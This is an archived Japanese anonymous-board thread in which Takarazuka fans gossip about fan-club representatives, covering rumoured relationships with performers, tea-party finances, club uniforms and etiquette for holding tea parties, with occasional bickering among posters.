401 :名無しさん@花束いっぱい。:2006/12/30(土) 23:01:12 ID:Ngh5hiDV
出来てるってどういうこと?そう見えるだけっしょ? (-.-)y-~

402 :名無しさん@花束いっぱい。:2006/12/30(土) 23:05:29 ID:LJ4wV7vv
>398
だけじゃないよ、どこまでか範囲はよくわからないけど。

403 :名無しさん@花束いっぱい。:2006/12/30(土) 23:33:24 ID:uOvP2WVB
>402
そうなんだ。ありがトン!

404 :名無しさん@花束いっぱい。:2006/12/30(土) 23:35:39 ID:9BkP26tD
うちの会の代表と○○○、仲良すぎだった。あれ絶対できてる。デパートの目撃情報では、べったり恋人状態だったって。入出もニコニコ。代表観劇したらそこしか見ない。実際はどうかわからないけど、まあいつも一緒だからなあ

405 :名無しさん@花束いっぱい。:2006/12/31(日) 00:01:17 ID:p51hvyY6
友達感覚っしょ。友達と買い物行けば、べったりするよな、変な意味なく、何する〜?とか言ってふざけっこみたいなさ。

406 :名無しさん@花束いっぱい。:2006/12/31(日) 00:32:15 ID:9E2k08av
でもトップクラスになると、お茶会で1000〜2000人
位入るから、5000円で計算すると500〜1000万円
の金が動く事になるでしょ。

実費で幾らかかるか知らないけど、そのお金って代表が懐に
入れたりしないのかな?

407 :名無しさん@花束いっぱい。:2006/12/31(日) 00:41:56 ID:/am8zo3q
>>406
「でも」
って何に対して、でもなんだろう…

答え つ「しません」


408 :名無しさん@花束いっぱい。:2006/12/31(日) 03:33:45 ID:agLSE7aY
過去やっちゃった代表いたじゃん。
その後は当然クビになったし、使い込み分の取立もあった。

409 :名無しさん@花束いっぱい。:2006/12/31(日) 03:51:32 ID:YZfw48tb
大小違えどバレて首は結構いるノシ。

410 :名無しさん@花束いっぱい。:2006/12/31(日) 13:31:44 ID:/am8zo3q
だから、やったらばれるしクビなんだよ。
普通はしないってことさ。

411 :名無しさん@花束いっぱい。:2006/12/31(日) 17:32:34 ID:1aqS3OE5
代表とデキテル、てそんな綺麗な代表さんがいる会もあるんだあ〜。私の入ってる会は……
あの代表とデキテたらもの好きだよ

412 :名無しさん@花束いっぱい。:2006/12/31(日) 20:03:24 ID:4ZeeC3AM
>>411
ウチの会は代表さん綺麗…というか、かわいいと思う

413 :名無しさん@花束いっぱい。:2006/12/31(日) 20:14:32 ID:YZfw48tb
合い鍵持ってる代表って割といるのにびっくり。

414 :名無しさん@花束いっぱい。:2006/12/31(日) 20:51:28 ID:1aqS3OE5
マジで〜!合い鍵なんて羨ましいような、ちょっとヒクような…

415 :名無しさん@花束いっぱい。:2006/12/31(日) 21:12:55 ID:c6Uurtcp
〇〇〇、退団してからもどこに行くのも一緒らしい。
某所で目撃した知人、〇〇〇の方がぴったりずっとしゃべってたって。
やめたんだから雇われたのかつきあっているのか…
よくわからんなぁ

416 :名無しさん@花束いっぱい。:2006/12/31(日) 21:32:37 ID:9E2k08av
東アサコ会代表とアサコたんは、一緒に帝劇に
エリザ観に行ってたお。。

417 :名無しさん@花束いっぱい。:2006/12/31(日) 22:51:06 ID:yQQBmL94
>>414
合鍵持ってるのは、多分
「あれ忘れたから持ってきて!」
ってことがよくあるんだと思う・・・。

418 :名無しさん@花束いっぱい。:2006/12/31(日) 23:19:11 ID:WqaKcut8
普通に荷物を運んだりだよ…。

419 :名無しさん@花束いっぱい。:2007/01/01(月) 03:09:23 ID:FNFRu4cw
娘役さんのスタッフってどんな人がなんの?(-_-)

420 :名無しさん@花束いっぱい。:2007/01/01(月) 03:12:38 ID:FNFRu4cw
あおいタンて楽屋出はほとんど帽子かぶってたりで目立たないよね〜。偶然見たんだけど美人だたよ。(^nn^)

421 :名無しさん@花束いっぱい。:2007/01/01(月) 03:14:15 ID:FNFRu4cw
あひの同期あおいタン。

422 :名無しさん@花束いっぱい。:2007/01/01(月) 14:53:02 ID:MjtZocKX
雪組の葵フブキタソのことじゃなかったのね・・

423 :名無しさん@花束いっぱい。:2007/01/01(月) 17:07:39 ID:MdhJTUcu
>>419
どういう意味?

424 :名無しさん@花束いっぱい。:2007/01/01(月) 18:09:53 ID:FNFRu4cw
娘役さんとデキちゃったりするの?

425 :名無しさん@花束いっぱい。:2007/01/01(月) 18:12:00 ID:FNFRu4cw
娘役さんならあおいタンかな。(-_-)

426 :名無しさん@花束いっぱい。:2007/01/01(月) 18:15:07 ID:FNFRu4cw
年賀状来ねぇ。(-_-)d

427 :名無しさん@花束いっぱい。:2007/01/01(月) 18:33:21 ID:FNFRu4cw
age

428 : 【大吉】 【902円】 :2007/01/01(月) 18:39:52 ID:MErrSY/v
糞でないのかい

429 :名無しさん@花束いっぱい。:2007/01/02(火) 14:16:22 ID:f375cCOJ
初日から元桐生代表大忙し。
まだまだ代表づらー。
いつまでやってるんだ。

430 :名無しさん@花束いっぱい。:2007/01/02(火) 15:42:24 ID:hu3uU7s5
現代表のデキが悪いってことなの?
そんなあなたは桐生フアソ?

431 :名無しさん@花束いっぱい。:2007/01/02(火) 18:18:31 ID:ALaTDvH/
生徒に切られた元代表が
今も会の仕事するってどーなの?

現代表って元スタだっけ?>桐生会

432 :名無しさん@花束いっぱい。:2007/01/02(火) 20:47:05 ID:LLEgvUZk
>>431
現代表が元スタかどうかも知らない431が、
なんで元代表が代表やめた理由が「生徒に切られた」なんてわかるんだ?

つか、代表やめても会の仕事する代表なんて他にもたくさんいるのに、
そのか会だけが言われるってどういうこと?
私怨?

433 :名無しさん@花束いっぱい。:2007/01/02(火) 21:53:46 ID:xyfSo+tU
もうそのか会元代表の話飽きた
完全私怨でそ?



434 :名無しさん@花束いっぱい。:2007/01/03(水) 01:12:18 ID:Cy6irLKi
ぽいよね。

435 :名無しさん@花束いっぱい。:2007/01/03(水) 09:19:25 ID:64KkxCnT
>432
今までのココのレス読んでたらだいたいわかる

真相は知らんがな



436 :名無しさん@花束いっぱい。:2007/01/03(水) 19:47:55 ID:RHK/vnA3
娘役のスタッフは、生徒が音校入学前の学生時代の
友人とかが多いんじゃない?

男役みたいに、人気が出ると大もうけできるほど集客
力もないから。
男役スタッフがお茶会代金を持ち逃げしたとか、たまに
聞くよね。
事実かどうかはしらないけど。

437 :名無しさん@花束いっぱい。:2007/01/03(水) 20:22:40 ID:hBIN9/Ea
私が知ってた頃の娘役スタッフは、やっぱり男役さん同様、ファンからって人が多かったかな。
あまり友達っていうのは聞かなかったです。
まあ会がない娘役さんも多かったし、スタッフの数も少なかったと思います。
代表さんもそんな感じ。
ちなみに東です。

438 :名無しさん@花束いっぱい。:2007/01/03(水) 21:01:42 ID:MZabEVB+
同じく卒業した娘役東会。
某路線男役と仲が良かった路線娘役。生徒も会も仲が良かった。
男役会はスタッフの数が足りていて、不足していた娘役会がスタッフをかりた。
そして、そのまま娘役会の正式スタッフになったという人がいた。

439 :名無しさん@花束いっぱい。:2007/01/03(水) 22:07:40 ID:8jNTby5O
退団した某別格娘役代表の華麗なる遍歴。
中学〜高校時代は生徒が娘1なるまでファン→スタッフとして。大学受験を機に一度スタッフ辞めるが、合格後新進路線男役のファンになりすぐにまたスタッフ。が、同じ中学出身の先輩が娘役として初舞台を踏むと、そちらに移行。別格路線に乗り退団するまで代表やる。
退団した娘1や代表、男役代表らは非難するどころか、とても可愛がって影でいつも支えてあげてた。恵まれてるのか人徳なのか…

440 :名無しさん@花束いっぱい。:2007/01/03(水) 23:04:03 ID:MZabEVB+
>>439
慶応大学のコケシちゃん?

441 :名無しさん@花束いっぱい。:2007/01/03(水) 23:09:33 ID:HyqTQxWg
私の大好きな、そのか元西代表話。
初日に何したの?花出し手伝いかな?
話に乗り遅れて残念。
そのかから嫌がられて最終的に切られた代表。
新代表は、何もできない、くず代表。同期にも相手にされてないから。
そのか代表話大好きだから、もっとしましょう。

442 :名無しさん@花束いっぱい。:2007/01/04(木) 00:33:11 ID:Smo5MYCh
>>441
私怨丸出し( ゜Д゜)
こんなファソがいる生徒もかわいそうだ

443 :名無しさん@花束いっぱい。:2007/01/04(木) 00:42:26 ID:xBH99X//
暇な煽ラーでしょう。

444 :名無しさん@花束いっぱい。:2007/01/04(木) 01:29:12 ID:INkWEFgs
444

445 :名無しさん@花束いっぱい。:2007/01/04(木) 09:45:13 ID:PsMaflRa
アリス会の代表ってどう?

446 :名無しさん@花束いっぱい。:2007/01/04(木) 10:32:50 ID:gAzEjeEP
どう?ってどうゆう意味?

447 :名無しさん@花束いっぱい。:2007/01/04(木) 12:43:17 ID:1ibHmRbC
>>439
そうそう、実はFC幹部は横の繋がりが凄いから、そういう話のほうが実は多いんだよね。
ここには良くない話ばかりが書かれるが。
私の知り合いも路線男役お手伝い→上級生脇男役代表にシフトしたが、
幹部同士で仲良くしていてチケットのやり取りなんかもいまだにあったりする。

448 :名無しさん@花束いっぱい。:2007/01/04(木) 18:12:02 ID:kaaTnCEe
生徒が卒業まで勤め上げた代表や途中交代しても
円満退職だった場合は、結構お付き合い続くよね。
代表は人脈作っとかないと大変だと思うわ。
サヨナラの時のお手伝いの集まり具合みてると何となく分かる。
ご贔屓の同期代表陣から総スカン喰らってるアノ代表、大丈夫かなぁ

449 :名無しさん@花束いっぱい。:2007/01/04(木) 18:30:29 ID:1ibHmRbC
>>448
そうそう。
だから、以前に娘1から路線男役にシフトした某代表があれだけ叩かれたのは、
性格か行動に問題があったか私怨のどちらかなんだよね。

450 :名無しさん@花束いっぱい。:2007/01/04(木) 19:35:35 ID:iRNqlRXO
>>448
あの代表で退団したら、同期会は手伝いたくないよな。
下級生会が可哀相。
でも、生徒は100%信頼してるねorz

451 :名無しさん@花束いっぱい。:2007/01/04(木) 21:33:36 ID:bfUeeTVq
それは某雪86期さんですか?

452 :名無しさん@花束いっぱい。:2007/01/04(木) 22:48:51 ID:csDXOsWG
たにの会服にびっくり!!!
かしちゃんとこの会服おしゃれ

453 :名無しさん@花束いっぱい。:2007/01/05(金) 00:17:48 ID:Mf6JWB51
月組の会服情報おながいします。

454 :名無しさん@花束いっぱい。:2007/01/05(金) 00:40:43 ID:jI7C5GLQ
453タンに便乗!!
オレンジ色のベスト?ってドコの会?
みっちゃんかと思ったが組替えやし???


455 :名無しさん@花束いっぱい。:2007/01/05(金) 01:13:03 ID:oei8z3iJ
そのかさんとこでは?

456 :名無しさん@花束いっぱい。:2007/01/05(金) 07:50:11 ID:/1h9M4sc
元月娘1会でしょ?

457 :名無しさん@花束いっぱい。:2007/01/05(金) 08:51:36 ID:H6rVffUs
456タンが言ってるのは代表話だよね。
えみ●ら→まさ●の代表でしょ?
追い出されたまさ●代表って宙の蓮●の代表って聞いたけどほんと?

458 :名無しさん@花束いっぱい。:2007/01/05(金) 13:08:14 ID:Qf4TT5LH
最近、わたるさんの新しい会ができたと聞いたのだが、今までの東会がやってるのかな?それとも西会?それとも全く新しい人?やめても代表ってつくの?

459 :名無しさん@花束いっぱい。:2007/01/05(金) 19:39:38 ID:rOzNxs1N
457タン
本当です!!!!!!ww

460 :名無しさん@花束いっぱい。:2007/01/05(金) 23:11:13 ID:HZgQxnj8
代表がつくかどうかは生徒との関係次第。
わたるがどうか知らないけどね〜

461 :454:2007/01/06(土) 00:35:54 ID:D5uuP/Iu
>455タン
あのオレンジは園加ちゃんちなんですかね?
それとも違う質問の答えなんでしょうか…?



462 :名無しさん@花束いっぱい。:2007/01/06(土) 00:42:10 ID:RHfIc3zS
>461
455ではないですが、オレンジのベストはそのかちゃんのところだよ。

463 :455:2007/01/06(土) 00:45:18 ID:uU5xbhR1
え〜と454さんへのお答えです。
オレンジのベストはそのかさんとこだと聞いたのですが…

464 :名無しさん@花束いっぱい。:2007/01/06(土) 09:12:05 ID:D5uuP/Iu
>462&>463
アリマトー
84期繋がりなんだw

465 :名無しさん@花束いっぱい。:2007/01/06(土) 12:20:20 ID:A2Lmj6Ki
遅レス スマソ448です
>451 455 456さんは残念ながら別人ですf^_^;
>450さんは同じ人のコト、ゆーてるとオモ

466 :名無しさん@花束いっぱい。:2007/01/08(月) 19:17:39 ID:aO5BxvAh
教えてください!
お茶会を今回ひらくことになったのですが、同じ組のファンクラブのある人に許可をえないといけなかったのでしょうか…?


467 :名無しさん@花束いっぱい。:2007/01/08(月) 19:53:24 ID:RDVmdK4v
必要はないが、もしアナタが月87なら、挨拶くらいいっとけw
宙、雪なら無問題。

468 :名無しさん@花束いっぱい。:2007/01/08(月) 20:41:17 ID:Bu4F600V
>>466
まず“お茶会をする”って事は、会になってて組に登録してる? 貴方は代表さん?

それなら、公演の話し合いの時にお茶会が何日かを報告しあうと思うのですが
会になってるなら、お茶会するのは当然の事ですからね
開催自体に許可は不要ですが、日にちは報告したりしますよ

会になってないなら、お茶会ではなくお茶飲み会と称しますが
組から認められてもいない集まりなので、許可を取る必要もありません
ひっそりと開催すれば良いだけですw

469 :名無しさん@花束いっぱい。:2007/01/08(月) 20:58:43 ID:HU2T6S2X
てか466みたいな無知なお子ちゃまにお茶会(代表)されるファンも生徒も可哀想。
誰だか知りたいわw

470 :名無しさん@花束いっぱい。:2007/01/08(月) 21:29:57 ID:aO5BxvAh
ご丁寧にありがとうございました。

471 :名無しさん@花束いっぱい。:2007/01/08(月) 21:59:35 ID:cDRalarO
>470 87期ですか?

もし同期の人に会やお付のいる人がいたら、
紹介してもらって、色々しきたりを学んでおいた方が良いですよ。

472 :名無しさん@花束いっぱい。:2007/01/08(月) 22:22:49 ID:aO5BxvAh
分かりました!あたってみます。ありがとうございます。
87ではありません。まだお茶飲み会です。


473 :名無しさん@花束いっぱい。:2007/01/09(火) 05:28:39 ID:4kBBOKlO
月87って書いたのは、あそこの代表、前月娘1代表時代に
その件で下の娘会代表にいちゃもんつけた事あるからw
会あるなら花1とかには挨拶しといて損はないけど。
ないなら無問題。

474 :名無しさん@花束いっぱい。:2007/01/09(火) 16:15:37 ID:A3h8ss55
お茶飲みでも、こういう場所ではやっちゃいけない、とかしきたりがあるみたいよ。
気をつけてね。

475 :名無しさん@花束いっぱい。:2007/01/09(火) 21:24:15 ID:azcjGkJi
前月娘1代表はどんだけ偉いんだ??
そんなものなのか…

476 :名無しさん@花束いっぱい。:2007/01/10(水) 01:30:31 ID:BU3/nAKw
とにかくえらそうだった。
りかちゃんちに可愛がられているのをかさに、とにかく態度でかくてその割には仕事はさっぱり。


477 :名無しさん@花束いっぱい。:2007/01/10(水) 14:03:49 ID:YLvUGuQG
そうなんだ。今も相変わらずなの?
下級生だからそれはないか。

478 :名無しさん@花束いっぱい。:2007/01/10(水) 14:47:33 ID:r3Ym+t08
代表の人は生徒宛のファンレター読んだりすることがあるらしいですが
本当なのですか?

479 :名無しさん@花束いっぱい。:2007/01/10(水) 15:27:53 ID:g9TH71sj
>>478
会による。
会に入っていない人からのファンレターは、基本的に代表が
目を通してから本人に渡す、という感じにしている生徒さんもいるし、
代表に一切読ませない生徒さんもいる。


480 :名無しさん@花束いっぱい。:2007/01/10(水) 15:28:56 ID:JKIVqkzi
祐飛の子分が祐飛の下級生のときに似てて可愛い笑。

481 :名無しさん@花束いっぱい。:2007/01/10(水) 16:14:23 ID:CYl8aVcW
>>478みたいな痛い子のは生徒が見せて確実に読むだろうね〜w
初心者スレ逝けば?

482 :名無しさん@花束いっぱい。:2007/01/10(水) 17:33:00 ID:r3Ym+t08
>>481
あんたのほうが痛い子だろうね。

483 :名無しさん@花束いっぱい。:2007/01/10(水) 17:48:22 ID:CYl8aVcW
>>482=花娘の真性厨。
sage方くらい覚えてからカキコしまちょーね。

484 :名無しさん@花束いっぱい。:2007/01/11(木) 01:02:03 ID:p2LIsJp5
星娘1の東の代表ってどんな人?
久々に見かけたら違う人だったので、気になった。

485 :名無しさん@花束いっぱい。:2007/01/11(木) 01:47:08 ID:wiSNBwDS
今の星娘1東代表さんって代表になってだいぶ経つんじゃない?

107 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)